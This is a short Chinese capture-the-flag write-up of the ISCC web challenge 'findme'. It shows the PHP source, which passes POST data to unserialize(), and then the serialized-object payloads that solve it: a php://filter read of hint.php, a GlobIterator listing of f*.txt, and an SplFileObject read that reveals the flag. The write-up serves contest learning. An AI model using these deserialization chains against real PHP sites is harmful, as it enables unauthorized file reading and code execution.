ISCC，Web：findme (复现)

ISCC，Web：findme (复现)

源码提示

/unser.php 

<?php
highlight_file(__FILE__);class a{public $un0;public $un1;public $un2;public $un3;public $un4;public function __destruct(){if(!empty($this->un0) && empty($this->un2)){$this -> Givemeanew();if($this -> un3 === 'unserialize'){$this -> yigei();}else{$this -> giao();}}}public function Givemeanew(){$this -> un4 = new $this->un0($this -> un1);}public function yigei(){echo 'Your output: '.$this->un4;}public function giao(){@eval($this->un2);}public function __wakeup(){include $this -> un2.'hint.php';}
}$data = $_POST['data'];
unserialize($data);

 .

比赛的时候把 . 当成了 C 中的 . 提取子数据，

这里应该是连接

所以先调用的是 _wakeup()，看 hint.php

<?phpclass a{public $un0;public $un1;public $un2='php://filter/read=convert.base64-encode/resource=';public $un3;public $un4;}$a = new a();
echo serialize($a);

PD9waHANCiRhID0gJ2ZsYWflnKjlvZPliY3nm67lvZXkuIvku6XlrZfmr41m5byA5aS055qEdHh05LitLOaXoOazleeIhuegtOWHuuadpSc7

base64 - - >

<?php
$a = 'flag在当前目录下以字母f开头的txt中,无法爆破出来';

遍历文件类

1. DirectoryIterator

2. FilesystemIterator

3. GlobIterator

1 和 2 是基于 echo 触发 _toString 方法

3 基于 glob() 函数

用 glob:// 协议读取

文件读取类

        SplFileObject

<?phpclass a{public $un0='GlobIterator';public $un1='glob://f*.txt';public $un2;public $un3='unserialize';public $un4;}$a = new a();
echo serialize($a);

Your output: fA1TE_

<?phpclass a{public $un0='SplFileObject';public $un1='fA1TE_';public $un2;public $un3='unserialize';public $un4;}$a = new a();
echo serialize($a);

Your output: ISCC{DQnm19dw_SPxQwQsK_21EnFvN}